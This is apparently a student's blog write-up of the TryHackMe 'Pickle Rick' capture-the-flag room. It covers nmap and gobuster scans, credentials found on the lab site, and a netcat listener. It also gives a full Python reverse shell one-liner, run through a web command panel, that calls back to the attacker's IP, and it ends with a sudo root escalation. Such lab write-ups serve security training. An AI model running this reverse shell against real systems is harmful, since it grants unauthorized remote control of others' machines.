Pickle Rick(Tryhackme) Room Writeup By Jonty Bhardwaj
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Pickle Rick.
Now first of all we will navigate to the Room URL and join it.
After starting the Machine we will first connect through Open VPN and ping the machine through the IP we are given to see if the connection is established. After we are successful in pinging the machine, we will start the fun part which is Pentesting and getting root privilege.
Now first we will start a Nmap scan to see what are the ports and services open on the machine.
nmap -sV -sT -t4 10.10.32.250
Now we can see that 2 ports are open and the most promising port we can gather info looks to be port 80. Lets see what’s on the website there.
Searching the source code of the main webpage we found some useful information in form of an Username.
Now we see that’s there is robots.txt file on the server and opening it we found some text written in it . It looks to be some sort of password .
Till now we have found a username and text resembling password .
Username : R1ckRul3s
Password : Wubbalubbadubdub
Now lets find some more info on the website by running Gobuster scan to see if there are any hidden webpages or directories.
gobuster -Pn dir -u http://10.10.32.250/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
Running the gobuster scan we found out that there is a login page on the server named /logon.php
Lets open this webpage see whats in there.
With the credentials we have gathered we login into the webpage successfully and found a command tab.
We can exploit this command tab to see critical information on the server or even run reverse shell on it and get a shell back on our system.
On the command tab we ran the ls command and found out that there are many files on the server.
Here we see that we have found the first ingredient file named Sup3rS3cretPickl3Ingred.txt
Lets open this file on the browser and see what’s the ingredient .
We have found our First Ingredient .
Now lets try to run a single liner reverse shell command on the server and try to get a shell back on our listner .
Lets open our listener first.
nc -lnvp 4444
Listener is open and ready now we have to run a reverse shell command on the command panel to get a shell back.
We searched if the machine has python installed or not
Python 3 is installed in the system which means we can use python 3 reverse shell .
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.107.42”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’
As soon as we executed the reverse shell on the command panel we got a shell back on our listener .
After some searching we found the second ingredient in the user rick directory .
cat /home/rick/”second ingredients”
Now lets see the permissions of this user if we can access the root directory or not .
As we can see here the user has all the permissions of sudo and looks like to be a sudo user .
It makes our job extremely easy as we don’t have to exploit any program to get root privilege .
Here we have successfully escalated to root shell after using the exploit command and found the third ingredient in the root folder.
Proof of Completion
Congratulations on completing the room and reading the blog . Hope my blog helped you in your journey and made you learn something new .
Happy Hacking !!